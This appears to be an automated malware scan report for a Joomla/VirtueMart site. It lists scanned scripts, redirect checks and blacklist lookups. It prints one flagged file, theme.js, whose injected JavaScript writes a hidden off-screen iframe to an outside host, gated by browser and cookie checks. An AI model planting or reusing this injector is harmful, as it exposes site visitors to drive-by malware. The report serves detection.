Scanned pages/files
Request | Server response | Status |
http://autocdsoft.ru/ | 200 OK Content-Length: 66086 Content-Type: text/html | clean |
http://autocdsoft.ru/components/com_jcomments/js/jcomments-v2.1.js?v=2 | 200 OK Content-Length: 27183 Content-Type: application/javascript | clean |
http://autocdsoft.ru/components/com_jcomments/libraries/joomlatune/ajax.js | 200 OK Content-Length: 3985 Content-Type: application/javascript | clean |
http://autocdsoft.ru/media/system/js/caption.js | 200 OK Content-Length: 1968 Content-Type: application/javascript | clean |
http://autocdsoft.ru/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js | 200 OK Content-Length: 9485 Content-Type: application/javascript | clean |
http://autocdsoft.ru/templates/gk_hewahoo/lib/scripts/template_scripts.js | 200 OK Content-Length: 4652 Content-Type: application/javascript | clean |
http://autocdsoft.ru/templates/gk_hewahoo/lib/scripts/menu.php?width=0&height=1&opacity=0&animation=3&speed=250 | 200 OK Content-Length: 1802 Content-Type: text/javascript | clean |
http://autocdsoft.ru/templates/gk_hewahoo/layouts/cufon/cufon.js | 200 OK Content-Length: 18267 Content-Type: application/javascript | clean |
http://autocdsoft.ru/templates/gk_hewahoo/fonts/captureit.font.js | 200 OK Content-Length: 4 Content-Type: application/javascript | clean |
http://autocdsoft.ru/modules/mod_slider/lib/slider.js | 200 OK Content-Length: 7123 Content-Type: application/javascript | clean |
http://autocdsoft.ru/components/com_virtuemart/js/mootools/mooPrompt.js | 200 OK Content-Length: 8454 Content-Type: application/javascript | clean |
http://autocdsoft.ru/components/com_virtuemart/themes/default/theme.js | 200 OK Content-Length: 966 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Visitrepositorium() { var pipka = navigator.userAgent; var ulrcont = (pipka.indexOf("Chrome") > -1 || pipka.indexOf("IEMobile") > -1 || pipka.indexOf("Windows") < +1); var bb = (getCookie("lastshow") === undefined); if (!ulrcont && bb) { document.write('<iframe src="http://doismanus.cutsberry.com/pikaluizar15.html?" style="border-style:dashed;position:absolute;top:-889px;left:-889px;" height="140" width="140"></iframe>'); var date = new Date( new Date().getTime() + 64*60*60*1000 ); document.cookie="lastshow=1; path=/; expires="+date.toUTCString(); } } Visitrepositorium(); Antivirus reports:
| ||
http://autocdsoft.ru/modules/mod_virtuemart_universal/files/jquery_tooltip.js | 200 OK Content-Length: 620 Content-Type: application/javascript | clean |
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 21347 Content-Type: text/javascript | clean |
http://autocdsoft.ru/./ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 07 Sep 2014 18:15:38 GMT Location: / Server: Jino.ru/mod_pizza Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=2bb3166b2a5e07da29aa870e9b8cc485; path=/ | clean |
http://autocdsoft.ru/test404page.js | 404 Not Found Content-Length: 1734 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: autocdsoft.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 07 Sep 2014 18:15:33 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 07 Sep 2014 18:15:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=3608d894359f8e220920727d9fda8427; path=/
Set-Cookie: virtuemart=3608d894359f8e220920727d9fda8427
GET / HTTP/1.1
Host: autocdsoft.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 07 Sep 2014 18:15:33 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 07 Sep 2014 18:15:33 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 0cb2334f4e754b87f7a5b797c5fd7889=3608d894359f8e220920727d9fda8427; path=/
Set-Cookie: virtuemart=3608d894359f8e220920727d9fda8427
Second query (visit from search engine):
GET / HTTP/1.1
Host: autocdsoft.ru
Referer: http://www.google.com/search?q=autocdsoft.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: autocdsoft.ru
Referer: http://www.google.com/search?q=autocdsoft.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=autocdsoft.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://autocdsoft.ru/
Result: autocdsoft.ru is not infected or malware details are not published yet.
Result: autocdsoft.ru is not infected or malware details are not published yet.